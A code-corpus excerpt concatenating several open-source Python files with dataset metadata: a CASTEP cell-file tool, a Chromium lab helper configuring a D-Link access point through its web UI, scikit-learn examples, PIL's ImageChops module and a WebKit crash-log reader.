""" i = index_of_species_index(Z, n)
Returns the absolute index in the species list of the nth species of element Z.
"""
si = -1
for i, s in enumerate(species):
if DEBUG:
print "Testing atom %d, element %d to see if it matches %d." % (i, s, n)
if s == Z:
si += 1
if si == n:
return i
# Didn't find it
return -1
# Main program
if __name__ == '__main__':
print "castep_special_atom version 2.0"
print ""
print "Written by Kane O'Donnell, September 2013"
print ""
# Parse the command line arguments
parser = argparse.ArgumentParser(description="Make a named atom special in a .cell file")
parser.add_argument('SEED', help="Input file is SEED.cell")
parser.add_argument('Z', help="Element (e.g. C or 6) to make special.")
parser.add_argument('n', type=int, help="Make the nth atom of element Z special. 1-based.")
args = parser.parse_args()
# Convert from 1-based n and possibly-string Z to 0-based n and integer Z.
n = args.n - 1
z = getElementZ(args.Z)
# Sanity check on inputs
if n < 0:
print "ERROR: It looks like you've specified a negative number for the atomic index. Try again. Exiting..."
exit(0)
if z == 0:
print "ERROR: You've specified an unknown element - it has to be one of the ones in our universe, not imaginary ones! Try again. Exiting..."
exit(0)
# Read the cell and check for any species "0" - i.e. if we already have special atoms.
f = open(args.SEED+".cell", 'r')
lines = f.readlines()
f.close()
p, s, props = parse_cell(lines)
if 0 in s:
print "ERROR: There are unknown species in this file already - you already have at least one special atom. For safety reasons, cannot continue. Goodbye!"
exit(0)
si = index_of_species_index(s, z, n)
if si == -1:
print "ERROR: Didn't find atom %d of species %s. Exiting..." % (n, args.Z)
exit(0)
write_new_cell(args.SEED, p, s, props, si)
print "Goodbye!"
exit(0) | gpl-3.0 | -1,891,183,241,990,443,000 | 34.023739 | 157 | 0.577529 | false |
ThirdProject/android_external_chromium_org | chrome/test/functional/ap_lab/dlink_ap_configurator.py | 76 | 12111 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
import ap_configurator
import selenium.common.exceptions
class DLinkAPConfigurator(ap_configurator.APConfigurator):
"""Derived class to control the DLink DAP-1522."""
def __init__(self, pyauto_instance, admin_interface_url):
super(DLinkAPConfigurator, self).__init__(pyauto_instance)
# Override constants
self.security_disabled = 'Disable Wireless Security (not recommended)'
self.security_wep = 'WEP'
self.security_wpapsk = 'WPA-Personal'
self.security_wpa2psk = 'WPA-Personal'
self.security_wpa8021x = 'WPA-Enterprise'
self.security_wpa28021x = 'WPA2-Enterprise'
self.admin_interface_url = admin_interface_url
def _OpenLandingPage(self):
self.pyauto_instance.NavigateToURL('http://%s/index.php' %
self.admin_interface_url)
page_name = os.path.basename(self.pyauto_instance.GetActiveTabURL().spec())
if page_name == 'login.php' or page_name == 'index.php':
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'//*[@name="login"]'))
except selenium.common.exceptions.TimeoutException, e:
        # Maybe we were re-routed to the configuration page
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) ==
'bsc_wizard.php'):
return
logging.exception('WebDriver exception: %s', str(e))
login_button = self._driver.find_element_by_xpath('//*[@name="login"]')
login_button.click()
def _OpenConfigurationPage(self):
self._OpenLandingPage()
if (os.path.basename(self.pyauto_instance.GetActiveTabURL().spec()) !=
'bsc_wizard.php'):
self.fail(msg='Taken to an unknown page %s' %
self.pyauto_instance.GetActiveTabURL().spec())
# Else we are being logged in automatically to the landing page
wlan = '//*[@name="wlan_wireless"]'
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(wlan))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
wlan_button = self._driver.find_element_by_xpath(wlan)
wlan_button.click()
# Wait for the main configuration page, look for the radio button
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(
'id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
def GetRouterName(self):
return 'Router Name: DAP-1522; Class: DLinkAPConfigurator'
def GetRouterShortName(self):
return 'DAP-1522'
def GetNumberOfPages(self):
return 1
def GetSupportedBands(self):
return [{'band': self.band_2ghz,
'channels': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]},
{'band': self.band_5ghz,
'channels': [26, 40, 44, 48, 149, 153, 157, 161, 165]}]
def GetSupportedModes(self):
return [{'band': self.band_2ghz,
'modes': [self.mode_b, self.mode_g, self.mode_n,
self.mode_b | self.mode_g, self.mode_g | self.mode_n]},
{'band': self.band_5ghz,
'modes': [self.mode_a, self.mode_n, self.mode_a | self.mode_n]}]
def NavigateToPage(self, page_number):
# All settings are on the same page, so we always open the config page
self._OpenConfigurationPage()
return True
def SavePage(self, page_number):
# All settings are on the same page, we can ignore page_number
button = self._driver.find_element_by_xpath('//input[@name="apply"]')
button.click()
    # If we did not make changes, we are sent to the continue screen.
continue_screen = True
button_xpath = '//input[@name="bt"]'
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(button_xpath))
except selenium.common.exceptions.TimeoutException, e:
continue_screen = False
if continue_screen:
button = self._driver.find_element_by_xpath(button_xpath)
button.click()
# We will be returned to the landing page when complete
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath('id("enable")'))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('Unable to find the radio button on the main landing '
'page.\nWebDriver exception: %s', str(e))
return False
return True
def SetMode(self, mode, band=None):
# Mode overrides the band. So if a band change is made after a mode change
# it may make an incompatible pairing.
self.AddItemToCommandList(self._SetMode, (mode, band), 1, 800)
def _SetMode(self, mode, band=None):
# Create the mode to popup item mapping
mode_mapping = {self.mode_b: '802.11b Only', self.mode_g: '802.11g Only',
self.mode_n: '802.11n Only',
self.mode_b | self.mode_g: 'Mixed 802.11g and 802.11b',
self.mode_n | self.mode_g: 'Mixed 802.11n and 802.11g',
self.mode_n | self.mode_g | self.mode_b:
'Mixed 802.11n, 802.11g, and 802.11b',
self.mode_n | self.mode_g | self.mode_b:
'Mixed 802.11n, 802.11g, and 802.11b',
self.mode_a: '802.11a Only',
self.mode_n | self.mode_a: 'Mixed 802.11n and 802.11a'}
band_value = self.band_2ghz
if mode in mode_mapping.keys():
popup_value = mode_mapping[mode]
# If the mode contains 802.11a we use 5Ghz
if mode & self.mode_a == self.mode_a:
band_value = self.band_5ghz
# If the mode is 802.11n mixed with 802.11a it must be 5Ghz
elif mode & (self.mode_n | self.mode_a) == (self.mode_n | self.mode_a):
band_value = self.band_5ghz
      # If the mode is 802.11n mixed with something other than 802.11a it's 2Ghz
elif mode & self.mode_n == self.mode_n and mode ^ self.mode_n > 0:
band_value = self.band_2ghz
# If the mode is 802.11n then we default to 5Ghz unless there is a band
elif mode == self.mode_n:
band_value = self.band_5ghz
if band:
band_value = band
else:
      logging.exception('The mode selected %s is not supported by router %s.',
                        hex(mode), self.GetRouterName())
# Set the band first
self._SetBand(band_value)
popup_id = 'mode_80211_11g'
if band_value == self.band_5ghz:
popup_id = 'mode_80211_11a'
self.SelectItemFromPopupByID(popup_value, popup_id)
def SetRadio(self, enabled=True):
# If we are enabling we are activating all other UI components, do it first.
# Otherwise we are turning everything off so do it last.
if enabled:
weight = 1
else:
weight = 1000
# This disables all UI so it should be the last item to be changed
self.AddItemToCommandList(self._SetRadio, (enabled,), 1, weight)
def _SetRadio(self, enabled=True):
# The radio checkbox for this router always has a value of 1. So we need to
# use other methods to determine if the radio is on or not. Check if the
# ssid textfield is disabled.
ssid = self._driver.find_element_by_xpath('//input[@name="ssid"]')
if ssid.get_attribute('disabled') == 'true':
radio_enabled = False
else:
radio_enabled = True
if radio_enabled == enabled:
# Nothing to do
return
self.SetCheckBoxSelectedByID('enable', selected=False,
wait_for_xpath='id("security_type_ap")')
def SetSSID(self, ssid):
# Can be done as long as it is enabled
self.AddItemToCommandList(self._SetSSID, (ssid,), 1, 900)
def _SetSSID(self, ssid):
self._SetRadio(enabled=True)
self.SetContentOfTextFieldByID(ssid, 'ssid')
def SetChannel(self, channel):
self.AddItemToCommandList(self._SetChannel, (channel,), 1, 900)
def _SetChannel(self, channel):
self._SetRadio(enabled=True)
self.SetCheckBoxSelectedByID('autochann', selected=False)
self.SelectItemFromPopupByID(str(channel), 'channel_g')
# Experimental
def GetBand(self):
# The radio buttons do more than run a script that adjusts the possible
    # channels. We will just check the channel popup.
    self._SetRadio(enabled=True)
xpath = ('id("channel_g")')
self._OpenConfigurationPage()
try:
self._wait.until(lambda _: self._driver.find_element_by_xpath(xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('WebDriver exception: %s', str(e))
element = self._driver.find_element_by_xpath(xpath)
if element.find_elements_by_tag_name('option')[0].text == '1':
return self.band_2ghz
return self.band_5ghz
def SetBand(self, band):
    if band != self.band_2ghz and band != self.band_5ghz:
self.fail(msg='Invalid band sent %s' % band)
self.AddItemToCommandList(self._SetBand, (band,), 1, 900)
def _SetBand(self, band):
self._SetRadio(enabled=True)
if band == self.band_2ghz:
int_value = 0
wait_for_xpath = 'id("mode_80211_11g")'
elif band == self.band_5ghz:
int_value = 1
wait_for_xpath = 'id("mode_80211_11a")'
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" and @name="band"]'
% int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
try:
self._wait.until(lambda _:
self._driver.find_element_by_xpath(wait_for_xpath))
except selenium.common.exceptions.TimeoutException, e:
logging.exception('The appropriate mode popup could not be found after '
'adjusting the band. WebDriver exception: %s', str(e))
def SetSecurityDisabled(self):
self.AddItemToCommandList(self._SetSecurityDisabled, (), 1, 900)
def _SetSecurityDisabled(self):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_disabled, 'security_type_ap')
def SetSecurityWEP(self, key_value, authentication):
self.AddItemToCommandList(self._SetSecurityWEP, (key_value, authentication),
1, 900)
def _SetSecurityWEP(self, key_value, authentication):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wep, 'security_type_ap',
wait_for_xpath='id("auth_type")')
self.SelectItemFromPopupByID(authentication, 'auth_type',
wait_for_xpath='id("wep_key_value")')
self.SetContentOfTextFieldByID(key_value, 'wep_key_value')
self.SetContentOfTextFieldByID(key_value, 'verify_wep_key_value')
def SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self.AddItemToCommandList(self._SetSecurityWPAPSK,
(shared_key, update_interval), 1, 900)
def _SetSecurityWPAPSK(self, shared_key, update_interval=1800):
self._SetRadio(enabled=True)
self.SelectItemFromPopupByID(self.security_wpapsk, 'security_type_ap',
wait_for_xpath='id("wpa_mode")')
self.SelectItemFromPopupByID('WPA Only', 'wpa_mode',
wait_for_xpath='id("grp_key_interval")')
self.SetContentOfTextFieldByID(str(update_interval), 'grp_key_interval')
self.SetContentOfTextFieldByID(shared_key, 'wpapsk1')
def SetVisibility(self, visible=True):
self.AddItemToCommandList(self._SetVisibility, (visible,), 1, 900)
def _SetVisibility(self, visible=True):
self._SetRadio(enabled=True)
# value=0 is visible; value=1 is invisible
int_value = 0
if not visible:
int_value = 1
xpath = ('//*[contains(@class, "l_tb")]/input[@value="%d" '
'and @name="visibility_status"]' % int_value)
element = self._driver.find_element_by_xpath(xpath)
element.click()
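# Rough driver sketch (illustrative only, not part of the original harness;
# the pyauto instance and router address below are assumptions). The real
# tests queue changes through AddItemToCommandList, but the private setters
# can be exercised directly along these lines:
#
#   ap = DLinkAPConfigurator(pyauto_instance, '192.168.0.50')
#   ap.NavigateToPage(1)
#   ap._SetSSID('test_ssid')
#   ap._SetSecurityWPAPSK('secret passphrase')
#   ap.SavePage(1)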
| bsd-3-clause | -776,347,489,381,774,500 | 40.618557 | 80 | 0.63785 | false |
RachitKansal/scikit-learn | examples/feature_selection/plot_rfe_with_cross_validation.py | 226 | 1384 | """
===================================================
Recursive feature elimination with cross-validation
===================================================
A recursive feature elimination example with automatic tuning of the
number of features selected with cross-validation.
"""
print(__doc__)
import matplotlib.pyplot as plt
from sklearn.svm import SVC
from sklearn.cross_validation import StratifiedKFold
from sklearn.feature_selection import RFECV
from sklearn.datasets import make_classification
# Build a classification task using 3 informative features
X, y = make_classification(n_samples=1000, n_features=25, n_informative=3,
n_redundant=2, n_repeated=0, n_classes=8,
n_clusters_per_class=1, random_state=0)
# Create the RFE object and compute a cross-validated score.
svc = SVC(kernel="linear")
# The "accuracy" scoring is proportional to the number of correct
# classifications
rfecv = RFECV(estimator=svc, step=1, cv=StratifiedKFold(y, 2),
scoring='accuracy')
rfecv.fit(X, y)
print("Optimal number of features : %d" % rfecv.n_features_)
# Plot number of features VS. cross-validation scores
plt.figure()
plt.xlabel("Number of features selected")
plt.ylabel("Cross validation score (nb of correct classifications)")
plt.plot(range(1, len(rfecv.grid_scores_) + 1), rfecv.grid_scores_)
plt.show()
| bsd-3-clause | 6,433,790,137,123,866,000 | 36.405405 | 74 | 0.679191 | false |
ambujone/breath-hackathon | gae/lib/PIL/ImageChops.py | 40 | 7411 | #
# The Python Imaging Library.
# $Id$
#
# standard channel operations
#
# History:
# 1996-03-24 fl Created
# 1996-08-13 fl Added logical operations (for "1" images)
# 2000-10-12 fl Added offset method (from Image.py)
#
# Copyright (c) 1997-2000 by Secret Labs AB
# Copyright (c) 1996-2000 by Fredrik Lundh
#
# See the README file for information on usage and redistribution.
#
import Image
##
# The <b>ImageChops</b> module contains a number of arithmetical image
# operations, called <i>channel operations</i> ("chops"). These can be
# used for various purposes, including special effects, image
# compositions, algorithmic painting, and more.
# <p>
# At this time, channel operations are only implemented for 8-bit
# images (e.g. "L" and "RGB").
# <p>
# Most channel operations take one or two image arguments and returns
# a new image. Unless otherwise noted, the result of a channel
# operation is always clipped to the range 0 to MAX (which is 255 for
# all modes supported by the operations in this module).
##
##
# Return an image with the same size as the given image, but filled
# with the given pixel value.
#
# @param image Reference image.
# @param value Pixel value.
# @return An image object.
def constant(image, value):
"Fill a channel with a given grey level"
return Image.new("L", image.size, value)
##
# Copy image.
#
# @param image Source image.
# @return A copy of the source image.
def duplicate(image):
"Create a copy of a channel"
return image.copy()
##
# Inverts an image
# (MAX - image).
#
# @param image Source image.
# @return An image object.
def invert(image):
"Invert a channel"
image.load()
return image._new(image.im.chop_invert())
##
# Compare images, and return lighter pixel value
# (max(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the lighter values.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def lighter(image1, image2):
"Select the lighter pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_lighter(image2.im))
##
# Compare images, and return darker pixel value
# (min(image1, image2)).
# <p>
# Compares the two images, pixel by pixel, and returns a new image
# containing the darker values.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def darker(image1, image2):
"Select the darker pixels from each image"
image1.load()
image2.load()
return image1._new(image1.im.chop_darker(image2.im))
##
# Calculate absolute difference
# (abs(image1 - image2)).
# <p>
# Returns the absolute value of the difference between the two images.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def difference(image1, image2):
"Subtract one image from another"
image1.load()
image2.load()
return image1._new(image1.im.chop_difference(image2.im))
##
# Superimpose positive images
# (image1 * image2 / MAX).
# <p>
# Superimposes two images on top of each other. If you multiply an
# image with a solid black image, the result is black. If you multiply
# with a solid white image, the image is unaffected.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def multiply(image1, image2):
"Superimpose two positive images"
image1.load()
image2.load()
return image1._new(image1.im.chop_multiply(image2.im))
##
# Superimpose negative images
# (MAX - ((MAX - image1) * (MAX - image2) / MAX)).
# <p>
# Superimposes two inverted images on top of each other.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def screen(image1, image2):
"Superimpose two negative images"
image1.load()
image2.load()
return image1._new(image1.im.chop_screen(image2.im))
##
# Add images
# ((image1 + image2) / scale + offset).
# <p>
# Adds two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def add(image1, image2, scale=1.0, offset=0):
"Add two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_add(image2.im, scale, offset))
##
# Subtract images
# ((image1 - image2) / scale + offset).
# <p>
# Subtracts two images, dividing the result by scale and adding the
# offset. If omitted, scale defaults to 1.0, and offset to 0.0.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def subtract(image1, image2, scale=1.0, offset=0):
"Subtract two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract(image2.im, scale, offset))
##
# Add images without clipping
# ((image1 + image2) % MAX).
# <p>
# Adds two images, without clipping the result.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def add_modulo(image1, image2):
"Add two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_add_modulo(image2.im))
##
# Subtract images without clipping
# ((image1 - image2) % MAX).
# <p>
# Subtracts two images, without clipping the result.
#
# @param image1 First image.
# @param image2 Second image.
# @return An image object.
def subtract_modulo(image1, image2):
"Subtract two images without clipping"
image1.load()
image2.load()
return image1._new(image1.im.chop_subtract_modulo(image2.im))
##
# Logical AND
# (image1 and image2).
def logical_and(image1, image2):
"Logical and between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_and(image2.im))
##
# Logical OR
# (image1 or image2).
def logical_or(image1, image2):
"Logical or between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_or(image2.im))
##
# Logical XOR
# (image1 xor image2).
def logical_xor(image1, image2):
"Logical xor between two images"
image1.load()
image2.load()
return image1._new(image1.im.chop_xor(image2.im))
##
# Blend images using constant transparency weight.
# <p>
# Same as the <b>blend</b> function in the <b>Image</b> module.
def blend(image1, image2, alpha):
"Blend two images using a constant transparency weight"
return Image.blend(image1, image2, alpha)
##
# Create composite using transparency mask.
# <p>
# Same as the <b>composite</b> function in the <b>Image</b> module.
def composite(image1, image2, mask):
"Create composite image by blending images using a transparency mask"
return Image.composite(image1, image2, mask)
##
# Offset image data.
# <p>
# Returns a copy of the image where data has been offset by the given
# distances. Data wraps around the edges. If yoffset is omitted, it
# is assumed to be equal to xoffset.
#
# @param image Source image.
# @param xoffset The horizontal distance.
# @param yoffset The vertical distance. If omitted, both
# distances are set to the same value.
# @return An Image object.
def offset(image, xoffset, yoffset=None):
"Offset image in horizontal and/or vertical direction"
if yoffset is None:
yoffset = xoffset
image.load()
return image._new(image.im.offset(xoffset, yoffset))
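##
# Illustrative usage sketch (added for clarity, not part of the original
# module). The file names are assumptions; any two same-sized "L" or "RGB"
# images will do:
#
#   import Image, ImageChops
#
#   im1 = Image.open("frame1.png")
#   im2 = Image.open("frame2.png")
#   diff = ImageChops.difference(im1, im2)
#   if diff.getbbox() is None:
#       print "the two images are pixel-identical"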
| mit | 7,220,353,483,006,293,000 | 23.539735 | 73 | 0.695588 | false |
rcbau/hacks | gerrit/utility.py | 1 | 1291 | #!/usr/bin/python
import decimal
import types
import unicodedata
import urllib
def DisplayFriendlySize(bytes):
"""DisplayFriendlySize -- turn a number of bytes into a nice string"""
t = type(bytes)
if t != types.LongType and t != types.IntType and t != decimal.Decimal:
return 'NotANumber(%s=%s)' %(t, bytes)
if bytes < 1024:
return '%d bytes' % bytes
if bytes < 1024 * 1024:
return '%d kb (%d bytes)' %((bytes / 1024), bytes)
if bytes < 1024 * 1024 * 1024:
return '%d mb (%d bytes)' %((bytes / (1024 * 1024)), bytes)
return '%d gb (%d bytes)' %((bytes / (1024 * 1024 * 1024)), bytes)
def Normalize(value):
normalized = unicodedata.normalize('NFKD', unicode(value))
normalized = normalized.encode('ascii', 'ignore')
return normalized
def read_remote_lines(url):
remote = urllib.urlopen(url)
data = ''
while True:
d = remote.read(100)
if not d:
break
data += d
if data.find('\n') != -1:
elems = data.split('\n')
for line in elems[:-1]:
yield line
data = elems[-1]
if data:
yield data
def read_remote_file(url):
data = []
for line in read_remote_lines(url):
data.append(line)
return '\n'.join(data)
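# Illustrative examples (not in the original file):
#
#   for line in read_remote_lines('http://example.com/status.txt'):
#       print line
#
#   DisplayFriendlySize(123456789)  # -> '117 mb (123456789 bytes)'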
| apache-2.0 | -2,032,916,939,893,834,500 | 20.881356 | 73 | 0.578621 | false |
digitalLumberjack/recalbox-configgen | runtest/case.py | 2 | 2950 | '''
Created on Mar 6, 2016
@author: Laurent Marchelli
'''
import os
import sys
import shutil
import unittest
from . import dir_res, dir_tmp
class TestCase(unittest.TestCase):
args_dict = {}
@classmethod
def setUpClass(cls, system, emulator):
# Define test system configuration path
cls.path_init = os.path.join(dir_res, emulator)
cls.path_user = os.path.join(dir_tmp, emulator)
# Define test needed objects
lst_args = [
"p1index", "p1guid", "p1name", "p1devicepath",
"p2index", "p2guid", "p2name", "p2devicepath",
"p3index", "p3guid", "p3name", "p3devicepath",
"p4index", "p4guid", "p4name", "p4devicepath",
"p5index", "p5guid", "p5name", "p5devicepath",
"system", "rom", "emulator", "core", "demo",
]
lst_values = [None] * len(lst_args)
cls.args_dict = dict(zip(lst_args, lst_values))
cls.args_dict['system'] = system
cls.args_dict['emulator'] = emulator
@classmethod
def tearDownClass(cls):
pass
def setUp(self):
# Cleanup previous test temporary files
if os.path.exists(self.path_user):
shutil.rmtree(self.path_user)
# Create test environment
os.makedirs(self.path_user)
# Copy class args into instance args to avoid corruption by
# test instances.
self.args = self.__class__.args_dict.copy()
def tearDown(self):
pass
def __init__(self, methodName='runTest', params=None, results=None, msg=None):
super(TestCase, self).__init__(methodName)
self.params = params
self.results = results
self.message = msg
def __str__(self):
msg = '' if self.message is None else '({})'.format(self.message)
return "{}.{}{}".format(self.__class__.__name__,
self._testMethodName, msg)
def assertDictContentEqual(self, d1, d2, msg=None):
self.assertListEqual(sorted(d1.items()),
sorted(d2.items()))
# Thanks to Rob Cowie (http://stackoverflow.com/users/46690/rob-cowie)
# From : http://stackoverflow.com/posts/6796752/revisions
class RedirectStdStreams(object):
def __init__(self, stdout=None, stderr=None):
self._stdout = stdout or sys.stdout
self._stderr = stderr or sys.stderr
def __enter__(self):
self.old_stdout, self.old_stderr = sys.stdout, sys.stderr
self.old_stdout.flush(); self.old_stderr.flush()
sys.stdout, sys.stderr = self._stdout, self._stderr
def __exit__(self, exc_type, exc_value, traceback):
self._stdout.flush(); self._stderr.flush()
sys.stdout = self.old_stdout
sys.stderr = self.old_stderr
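# Illustrative usage sketch (added for clarity, not part of the original
# helpers): capture a noisy block's output instead of letting it hit the
# console.
#
#   from StringIO import StringIO
#
#   captured = StringIO()
#   with RedirectStdStreams(stdout=captured, stderr=captured):
#       print "this line ends up in 'captured'"
#   print captured.getvalue()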
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4: | mit | 4,547,261,743,869,433,000 | 31.428571 | 82 | 0.58678 | false |
lombritz/odoo | addons/product_margin/__init__.py | 444 | 1092 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import wizard
import product_margin
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 | -3,188,084,370,870,802,400 | 41 | 79 | 0.613553 | false |
gitromand/phantomjs | src/qt/qtwebkit/Tools/Scripts/webkitpy/common/system/crashlogs.py | 117 | 5490 | # Copyright (c) 2011, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import codecs
import re
class CrashLogs(object):
PID_LINE_REGEX = re.compile(r'\s+Global\s+PID:\s+\[(?P<pid>\d+)\]')
def __init__(self, host, results_directory=None):
self._host = host
self._results_directory = results_directory
def find_newest_log(self, process_name, pid=None, include_errors=False, newer_than=None):
if self._host.platform.is_mac():
return self._find_newest_log_darwin(process_name, pid, include_errors, newer_than)
elif self._host.platform.is_win():
return self._find_newest_log_win(process_name, pid, include_errors, newer_than)
return None
def _log_directory_darwin(self):
log_directory = self._host.filesystem.expanduser("~")
log_directory = self._host.filesystem.join(log_directory, "Library", "Logs")
if self._host.filesystem.exists(self._host.filesystem.join(log_directory, "DiagnosticReports")):
log_directory = self._host.filesystem.join(log_directory, "DiagnosticReports")
else:
log_directory = self._host.filesystem.join(log_directory, "CrashReporter")
return log_directory
def _find_newest_log_darwin(self, process_name, pid, include_errors, newer_than):
def is_crash_log(fs, dirpath, basename):
return basename.startswith(process_name + "_") and basename.endswith(".crash")
log_directory = self._log_directory_darwin()
logs = self._host.filesystem.files_under(log_directory, file_filter=is_crash_log)
first_line_regex = re.compile(r'^Process:\s+(?P<process_name>.*) \[(?P<pid>\d+)\]$')
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
f = self._host.filesystem.read_text_file(path)
match = first_line_regex.match(f[0:f.find('\n')])
if match and match.group('process_name') == process_name and (pid is None or int(match.group('pid')) == pid):
return errors + f
except IOError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
def _find_newest_log_win(self, process_name, pid, include_errors, newer_than):
def is_crash_log(fs, dirpath, basename):
return basename.startswith("CrashLog")
logs = self._host.filesystem.files_under(self._results_directory, file_filter=is_crash_log)
errors = ''
for path in reversed(sorted(logs)):
try:
if not newer_than or self._host.filesystem.mtime(path) > newer_than:
log_file = self._host.filesystem.read_binary_file(path).decode('utf8', 'ignore')
match = self.PID_LINE_REGEX.search(log_file)
if match is None:
continue
if int(match.group('pid')) == pid:
return errors + log_file
except IOError, e:
print "IOError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except OSError, e:
print "OSError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to read '%s': %s\n" % (path, str(e))
except UnicodeDecodeError, e:
print "UnicodeDecodeError %s" % str(e)
if include_errors:
errors += "ERROR: Failed to decode '%s' as utf8: %s\n" % (path, str(e))
if include_errors and errors:
return errors
return None
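# Illustrative sketch (not part of the original module); host is assumed to
# be a SystemHost-like object and the pid an arbitrary example value:
#
#   crash_logs = CrashLogs(host)
#   log = crash_logs.find_newest_log('DumpRenderTree', pid=1234, include_errors=True)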
| bsd-3-clause | -6,988,606,583,348,061,000 | 47.584071 | 129 | 0.622951 | false |
tawsifkhan/scikit-learn | sklearn/linear_model/omp.py | 127 | 30417 | """Orthogonal matching pursuit algorithms
"""
# Author: Vlad Niculae
#
# License: BSD 3 clause
import warnings
from distutils.version import LooseVersion
import numpy as np
from scipy import linalg
from scipy.linalg.lapack import get_lapack_funcs
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from ..utils import as_float_array, check_array, check_X_y
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
import scipy
solve_triangular_args = {}
if LooseVersion(scipy.__version__) >= LooseVersion('0.12'):
# check_finite=False is an optimization available only in scipy >=0.12
solve_triangular_args = {'check_finite': False}
premature = """ Orthogonal matching pursuit ended prematurely due to linear
dependence in the dictionary. The requested precision might not have been met.
"""
def _cholesky_omp(X, y, n_nonzero_coefs, tol=None, copy_X=True,
return_path=False):
"""Orthogonal Matching Pursuit step using the Cholesky decomposition.
Parameters
----------
X : array, shape (n_samples, n_features)
Input dictionary. Columns are assumed to have unit norm.
y : array, shape (n_samples,)
Input targets
n_nonzero_coefs : int
Targeted number of non-zero elements
tol : float
Targeted squared error, if not None overrides n_nonzero_coefs.
copy_X : bool, optional
Whether the design matrix X must be copied by the algorithm. A false
value is only helpful if X is already Fortran-ordered, otherwise a
copy is made anyway.
return_path : bool, optional. Default: False
Whether to return every value of the nonzero coefficients along the
forward path. Useful for cross-validation.
Returns
-------
gamma : array, shape (n_nonzero_coefs,)
Non-zero elements of the solution
idx : array, shape (n_nonzero_coefs,)
Indices of the positions of the elements in gamma within the solution
vector
coef : array, shape (n_features, n_nonzero_coefs)
The first k values of column k correspond to the coefficient value
for the active features at that step. The lower left triangle contains
